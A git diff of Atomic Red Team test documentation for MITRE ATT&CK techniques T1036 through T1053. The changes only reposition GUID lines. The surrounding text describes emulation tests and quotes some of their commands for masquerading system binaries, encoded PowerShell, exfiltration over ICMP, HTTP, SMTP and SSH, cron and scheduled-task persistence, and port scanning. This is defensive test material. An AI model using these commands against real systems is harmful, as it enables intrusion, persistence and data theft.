## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe - -auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 - Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0 + + + @@ -125,15 +131,17 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe - -auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 - Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23 + + + @@ -158,15 +166,17 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe - -auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa - Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa + + + @@ -191,15 +201,17 @@ del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
## Atomic Test #6 - Masquerading - non-windows exe running as windows exe - -auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 - Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086 + + + #### Inputs: @@ -244,13 +256,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Masquerading - windows exe running as different windows exe - -auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 - Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe + **Supported Platforms:** Windows +**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0 + + + #### Inputs: @@ -282,16 +296,18 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
## Atomic Test #8 - Malicious process Masquerading as LSM.exe - -auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f - Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f + + + @@ -317,15 +333,17 @@ del C:\lsm.exe >nul 2>&1
## Atomic Test #9 - File Extension Masquerading - -auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc - download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe) + **Supported Platforms:** Windows +**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc + + + #### Inputs: diff --git a/atomics/T1036.004/T1036.004.md b/atomics/T1036.004/T1036.004.md index 7c1348a8..cc23c8db 100644 --- a/atomics/T1036.004/T1036.004.md +++ b/atomics/T1036.004/T1036.004.md @@ -14,13 +14,15 @@ Tasks or services contain other fields, such as a description, that adversaries
## Atomic Test #1 - Creating W32Time similar named service using schtasks - -auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 - Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao" + **Supported Platforms:** Windows +**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 + + + @@ -45,13 +47,15 @@ schtasks /tn win32times /delete /f
## Atomic Test #2 - Creating W32Time similar named service using sc - -auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66 - Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao" + **Supported Platforms:** Windows +**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66 + + + diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md index aab962e3..906ddca2 100644 --- a/atomics/T1036.005/T1036.005.md +++ b/atomics/T1036.005/T1036.005.md @@ -12,13 +12,15 @@ Adversaries may also use the same icon of the file they are trying to mimic. ## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory. - -auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 - Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24 + + + #### Inputs: diff --git a/atomics/T1036.006/T1036.006.md b/atomics/T1036.006/T1036.006.md index 72ccf8b3..6a9c6ddc 100644 --- a/atomics/T1036.006/T1036.006.md +++ b/atomics/T1036.006/T1036.006.md @@ -14,13 +14,15 @@ Adversaries can use this feature to trick users into double clicking benign-look
## Atomic Test #1 - Space After Filename - -auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f - Space After Filename + **Supported Platforms:** macOS +**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f + + + #### Run it with these steps! diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index e1e4f50b..7c5ef536 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -12,13 +12,15 @@ Renaming abusable system utilities to evade security monitoring is also a form o
## Atomic Test #1 - System File Copied to Unusual Location - -auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd - It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd + + + diff --git a/atomics/T1037.001/T1037.001.md b/atomics/T1037.001/T1037.001.md index 500ffdb3..40211c19 100644 --- a/atomics/T1037.001/T1037.001.md +++ b/atomics/T1037.001/T1037.001.md @@ -12,14 +12,16 @@ Adversaries may use these scripts to maintain persistence on a single system. De
## Atomic Test #1 - Logon Scripts - -auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 - Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. + **Supported Platforms:** Windows +**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231 + + + #### Inputs: diff --git a/atomics/T1037.002/T1037.002.md b/atomics/T1037.002/T1037.002.md index c642506b..145b05de 100644 --- a/atomics/T1037.002/T1037.002.md +++ b/atomics/T1037.002/T1037.002.md @@ -12,13 +12,15 @@ Adversaries may use these login hooks to maintain persistence on a single system
## Atomic Test #1 - Logon Scripts - Mac - -auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 - Mac logon script + **Supported Platforms:** macOS +**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4 + + + #### Run it with these steps! diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 94d9c640..d7876f5e 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -20,15 +20,17 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
## Atomic Test #1 - rc.common - -auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de - Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de + + + @@ -48,13 +50,15 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
## Atomic Test #2 - rc.common - -auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a - Modify rc.common + **Supported Platforms:** Linux +**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a + + + @@ -82,13 +86,15 @@ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /e
## Atomic Test #3 - rc.local - -auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 - Modify rc.local + **Supported Platforms:** Linux +**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102 + + + diff --git a/atomics/T1037.005/T1037.005.md b/atomics/T1037.005/T1037.005.md index 516684aa..278fe1fc 100644 --- a/atomics/T1037.005/T1037.005.md +++ b/atomics/T1037.005/T1037.005.md @@ -14,15 +14,17 @@ An adversary can create the appropriate folders/files in the StartupItems direct
## Atomic Test #1 - Add file to Local Library StartupItems - -auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 - Modify or create an file in /Library/StartupItems [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) + **Supported Platforms:** macOS +**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198 + + + diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index e2cb05d4..e2076782 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -20,15 +20,17 @@ Network sniffing may also reveal configuration details, such as running services
## Atomic Test #1 - Packet Capture Linux - -auto_generated_guid: 7fe741f7-b265-4951-a7c7-320889083b3e - Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. + **Supported Platforms:** Linux +**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e + + + #### Inputs: @@ -66,15 +68,17 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #2 - Packet Capture macOS - -auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608 - Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A. + **Supported Platforms:** macOS +**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608 + + + #### Inputs: @@ -112,16 +116,18 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #3 - Packet Capture Windows Command Prompt - -auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca - Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". + **Supported Platforms:** Windows +**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca + + + #### Inputs: @@ -173,14 +179,16 @@ Start-Process $env:temp\npcap_installer.exe
## Atomic Test #4 - Windows Internal Packet Capture - -auto_generated_guid: b5656f67-d67f-4de8-8e62-b5581630f528 - Uses the built-in Windows packet capture After execution you should find a file named trace.etl and trace.cab in the temp directory + **Supported Platforms:** Windows +**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528 + + + diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index f921f6a0..c97b6af1 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -18,15 +18,17 @@ Within cloud environments, adversaries may attempt to discover services running
## Atomic Test #1 - Port Scan - -auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540 - Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540 + + + @@ -49,15 +51,17 @@ done
## Atomic Test #2 - Port Scan Nmap - -auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f - Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f + + + #### Inputs: @@ -98,13 +102,15 @@ echo "Install nmap on the machine to run the test."; exit 1;
## Atomic Test #3 - Port Scan NMap for Windows - -auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df - Scan ports to check for listening ports for the local host 127.0.0.1 + **Supported Platforms:** Windows +**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df + + + #### Inputs: @@ -143,13 +149,15 @@ Start-Process $env:temp\nmap-7.80-setup.exe /S
## Atomic Test #4 - Port Scan using python - -auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c - Scan ports to check for listening ports with python + **Supported Platforms:** Windows +**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c + + + #### Inputs: diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index eb510624..7b2812cb 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -26,14 +26,16 @@ An adversary can use WMI to interact with local and remote systems and use it as
## Atomic Test #1 - WMI Reconnaissance Users - -auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea - An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line. + **Supported Platforms:** Windows +**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea + + + @@ -53,14 +55,16 @@ wmic useraccount get /ALL /format:csv
## Atomic Test #2 - WMI Reconnaissance Processes - -auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 - An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line. + **Supported Platforms:** Windows +**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2 + + + @@ -80,14 +84,16 @@ wmic process get caption,executablepath,commandline /format:csv
## Atomic Test #3 - WMI Reconnaissance Software - -auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 - An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed. + **Supported Platforms:** Windows +**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414 + + + @@ -107,17 +113,19 @@ wmic qfe get description,installedOn /format:csv
## Atomic Test #4 - WMI Reconnaissance List Remote Services - -auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 - An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable + **Supported Platforms:** Windows +**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3 + + + #### Inputs: @@ -143,14 +151,16 @@ wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
## Atomic Test #5 - WMI Execute Local Process - -auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 - This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. + **Supported Platforms:** Windows +**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 + + + #### Inputs: @@ -179,15 +189,17 @@ wmic process where name='#{process_to_execute}' delete >nul 2>&1
## Atomic Test #6 - WMI Execute Remote Process - -auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b - This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable + **Supported Platforms:** Windows +**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b + + + #### Inputs: @@ -219,9 +231,6 @@ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command - -auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c - Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand Where the –EncodedCommand, once decoded, would resemble: @@ -229,9 +238,14 @@ Where the –EncodedCommand, once decoded, would resemble: The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) + **Supported Platforms:** Windows +**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c + + + @@ -251,14 +265,16 @@ powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhA
## Atomic Test #8 - Create a Process using obfuscated Win32_Process - -auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 - This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic. [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32) + **Supported Platforms:** Windows +**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43 + + + #### Inputs: diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md index 0390ce51..db4db939 100644 --- a/atomics/T1048.003/T1048.003.md +++ b/atomics/T1048.003/T1048.003.md @@ -20,15 +20,17 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
## Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP - -auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff - A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337. Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff + + + #### Run it with these steps! @@ -56,15 +58,17 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
## Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP - -auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e - Exfiltration of specified file over ICMP protocol. Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e + + + #### Inputs: @@ -90,13 +94,15 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS - -auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 - Exfiltration of specified file over DNS protocol. + **Supported Platforms:** Linux +**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45 + + + #### Run it with these steps! @@ -122,14 +128,16 @@ Exfiltration of specified file over DNS protocol.
## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP - -auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c - Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c + + + #### Inputs: @@ -156,14 +164,16 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP - -auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 - Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9 + + + #### Inputs: diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index e60fdc42..53137544 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -16,17 +16,19 @@ Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network pr
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH - -auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988 - Input a domain and test Exfiltration over SSH Remote to Local Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988 + + + #### Inputs: @@ -51,17 +53,19 @@ ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH - -auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 - Input a domain and test Exfiltration over SSH Local to Remote Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268 + + + #### Inputs: diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index 192508b7..edc081e0 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -20,15 +20,17 @@ Utilities and commands that acquire this information include [netstat](https://a
## Atomic Test #1 - System Network Connections Discovery - -auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5 - Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5 + + + @@ -50,15 +52,17 @@ net sessions
## Atomic Test #2 - System Network Connections Discovery with PowerShell - -auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a - Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a + + + @@ -78,15 +82,17 @@ Get-NetTCPConnection
## Atomic Test #3 - System Network Connections Discovery Linux & MacOS - -auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 - Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 + + + @@ -119,15 +125,17 @@ echo "Install netstat on the machine."; exit 1;
## Atomic Test #4 - System Discovery using SharpView - -auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 - Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9 + + + #### Inputs: diff --git a/atomics/T1053.001/T1053.001.md b/atomics/T1053.001/T1053.001.md index 77547ae1..64bdb473 100644 --- a/atomics/T1053.001/T1053.001.md +++ b/atomics/T1053.001/T1053.001.md @@ -12,13 +12,15 @@ An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux envi
## Atomic Test #1 - At - Schedule a job - -auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e - This test submits a command to be run in the future by the `at` daemon. + **Supported Platforms:** Linux +**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e + + + #### Inputs: diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md index 0e22c703..615c84dd 100644 --- a/atomics/T1053.002/T1053.002.md +++ b/atomics/T1053.002/T1053.002.md @@ -14,16 +14,18 @@ Note: The at.exe command line utility has been deprecated in curren
## Atomic Test #1 - At.exe Scheduled task - -auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 - Executes cmd.exe Note: deprecated in Windows 8+ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. + **Supported Platforms:** Windows +**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + + + diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md index 47c5272a..dd2cfbef 100644 --- a/atomics/T1053.003/T1053.003.md +++ b/atomics/T1053.003/T1053.003.md @@ -16,13 +16,15 @@ An adversary may use cron in Linux or Unix environments to execute
## Atomic Test #1 - Cron - Replace crontab with referenced file - -auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 - This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75 + + + #### Inputs: @@ -53,13 +55,15 @@ crontab /tmp/notevil
## Atomic Test #2 - Cron - Add script to all cron subfolders - -auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + + + #### Inputs: @@ -95,13 +99,15 @@ rm /etc/cron.weekly/#{cron_script_name}
## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder - -auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 - This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4 + + + #### Inputs: diff --git a/atomics/T1053.004/T1053.004.md b/atomics/T1053.004/T1053.004.md index bed322f3..3692545d 100644 --- a/atomics/T1053.004/T1053.004.md +++ b/atomics/T1053.004/T1053.004.md @@ -12,13 +12,15 @@ An adversary may use the launchd daemon in macOS environments to sc
## Atomic Test #1 - Event Monitor Daemon Persistence - -auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e - This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. + **Supported Platforms:** macOS +**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e + + + #### Inputs: diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index 9fd444d6..5c41ae1d 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -24,14 +24,16 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
## Atomic Test #1 - Scheduled Task Startup Script - -auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 - Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. + **Supported Platforms:** Windows +**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2 + + + @@ -57,13 +59,15 @@ schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
## Atomic Test #2 - Scheduled task Local - -auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. + **Supported Platforms:** Windows +**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71 + + + #### Inputs: @@ -93,15 +97,17 @@ SCHTASKS /Delete /TN spawn /F >nul 2>&1
## Atomic Test #3 - Scheduled task Remote - -auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd - Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. + **Supported Platforms:** Windows +**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + + + #### Inputs: @@ -134,15 +140,17 @@ SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
## Atomic Test #4 - Powershell Cmdlet Scheduled Task - -auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd - Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. + **Supported Platforms:** Windows +**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + + + @@ -171,14 +179,16 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
## Atomic Test #5 - Task Scheduler via VBA - -auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 - This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run + **Supported Platforms:** Windows +**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3 + + + #### Inputs: @@ -222,13 +232,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
